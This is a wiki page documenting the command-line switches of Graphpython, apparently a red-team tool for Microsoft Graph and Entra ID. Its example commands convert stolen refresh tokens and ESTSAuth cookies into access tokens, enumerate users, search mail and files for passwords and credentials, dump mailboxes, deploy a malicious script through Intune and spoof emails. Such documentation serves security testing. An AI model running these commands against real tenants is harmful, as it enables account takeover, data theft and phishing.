mc edited this page Jul 24, 2024 · 22 revisions

This page documents the available arguments and switches for Graphpython.

usage: Graphpython [-h] [--command COMMAND] [--list-commands] [--token TOKEN] [--estsauthcookie ESTSAUTHCOOKIE] [--use-cae] [--cert CERT]
                   [--domain DOMAIN] [--tenant TENANT] [--username USERNAME] [--secret SECRET] [--id ID] [--select SELECT] [--query QUERY]
                   [--search SEARCH] [--entity {driveItem,message,chatMessage,site,event}] [--device {Mac,Windows,AndroidMobile,iPhone}]
                   [--browser {Android,IE,Chrome,Firefox,Edge,Safari}] [--only-return-cookies]
                   [--mail-folder {Allitems,inbox,archive,drafts,sentitems,deleteditems,recoverableitemsdeletions}] [--top TOP]
                   [--script SCRIPT] [--email EMAIL]


-h, --help

Show the help message and exit

Graphpython -h

--command COMMAND

Specify the command to execute

Graphpython --command get-currentuser --token <token>


List all available commands

Graphpython --list-commands


--token TOKEN

Provide a Microsoft Graph access token or refresh token for FOCI abuse. Can either supply the token raw or from a file

Graphpython --command get-user --token eyJ0...
Graphpython --command find-privilegedapplications --token token.txt 
Graphpython --command invoke-refreshtoazuremanagementtoken --token <refreshtoken> --tenant <tenantid>

--estsauthcookie ESTSAUTHCOOKIE

Supply 'ESTSAuth' or 'ESTSAuthPersistent' cookie for Invoke-ESTSCookieToAccessToken

Graphpython --command invoke-estscookietoaccesstoken ---estsauthcookie ESTSAUTHPERSISTENT=... --tenant <tenantid> --use-cae
Graphpython --command invoke-estscookietoaccesstoken ---estsauthcookie ESTSAUTH=... --tenant <tenantid> --use-cae


Flag to use Continuous Access Evaluation (CAE) which adds 'cp1' as a client claim to obtain an access token valid for 24 hours. Can be used with the following authentication commands:

  • Invoke-RefreshToMSGraphToken
  • Invoke-RefreshToAzureManagementToken
  • Invoke-RefreshToMSTeamsToken
  • Invoke-RefreshToOfficeAppsToken
  • Invoke-RefreshToOfficeManagementToken
  • Invoke-RefreshToOutlookToken
  • Invoke-RefreshToSubstrateToken
  • Invoke-RefreshToYammerToken
  • Invoke-RefreshToOneDriveToken
  • Invoke-RefreshToSharePointToken
  • Invoke-ESTSCookieToAccessToken
Graphpython --command <above> --token <refresh> --tenant <tenantid> --use-cae

--username USERNAME

Provide an email or a file containing user emails for outsider user enumeration

Graphpython --command invoke-userenumerationasoutsider --username [email protected]/users.txt

--cert CERT

Path to an X509Certificate

  • .pfx for Invoke-CertToAccessToken
  • .crt, .cer, or .pem for Add-ApplicationCertificate
Graphpython --command invoke-certtoaccesstoken --cert certificate.pfx --id <appid> --tenant <tenantid> 
Graphpython --command add-applicationcertificate --cert certificate.crt --id <appobjectid> --token <token>

--domain DOMAIN

Specify the target domain

Graphpython --command get-tenantid --domain
Graphpython --command invoke-reconasoutsider --domain

--tenant TENANT

Specify the target tenant ID. Used for more authentication/refresh commands

Graphpython --command invoke-refreshtomsgraphtoken --tenant <tenantid> --token <refresh> --use-cae

--secret SECRET

Enterprise application secretText value for generating access token with Invoke-AppSecretToAccessToken. Can also add and then use an application secret returned from Add-ApplicationSecret

Graphpython --command invoke-appsecrettoaccesstoken --secret <secretText> --id <appid> --token <token>


--id ID

ID of the target object. Multiple uses and can be object, app, user, group, ... ID. User Principal Name is also supported for user-based commands

Graphpython --command get-application --id <appid> --token <token>
Graphpython --command get-user --id [email protected] --token <token>

--select SELECT

Fields to select and filter from the response for refining heavy output

Graphpython --command get-user --select id,displayName,userPrincipalName --token <token>
Graphpython --command list-recentonedrivefiles --select name,webUrl --token <token>

--query QUERY

Raw API query URL (GET only) for use with Invoke-CustomQuery

Graphpython --command invoke-customquery --query --token <token>


Only used with Invoke-Search

--search SEARCH

Search string for querying

Graphpython --command invoke-search --search "password" --entity driveItem --token <token>

--entity ENTITY

Specify the type of entity to search for:

  • driveItem - OneDrive items
  • message - Mail messages
  • chatMessage - Teams chat messages
  • site - SharePoint sites
  • event - Calendar events
Graphpython --command invoke-search --search "credentials" --entity message --token <token>


Can be used for all commands

--device DEVICE

Specify the device type for User-Agent forging

  • Mac
  • Windows
  • AndroidMobile
  • iPhone
Graphpython --command get-userproperties --device Mac --browser Safari --token <token>

--browser BROWSER

Specify the browser type for User-Agent forging

  • Android
  • IE
  • Chrome
  • Firefox
  • Edge
  • Safari
Graphpython --command get-group --browser Edge --device Windows --token <token>


Only used with Dump-OWAMailbox

--mail-folder FOLDER

Specify the mail folder to dump

  • Allitems
  • inbox
  • archive
  • drafts
  • sentitems
  • deleteditems
  • recoverableitemsdeletions
Graphpython --command dump-owamailbox --mail-folder inbox --token <token>
Graphpython --command dump-owamailbox --mail-folder drafts --id <userid/upn> --token <token>

--top TOP

Number of messages to retrieve (integer) from the mail folder

Graphpython --command dump-owamailbox --mail-folder inbox --top 10 --token <token>
Graphpython --command dump-owamailbox --mail-folder drafts --id <userid/upn> --top 20 --token <token>


--script SCRIPT

File containing the script content for Deploy-MaliciousScript or Backdoor-Script

Graphpython --command deploy-maliciousscript --script malicious.ps1 --token <intunetoken>

--email EMAIL

File containing OWA email message body content for Spoof-OWAEmailMessage

Graphpython --command spoof-owaemailmessage --id <userid to spoof> --email email-body.txt --token <token>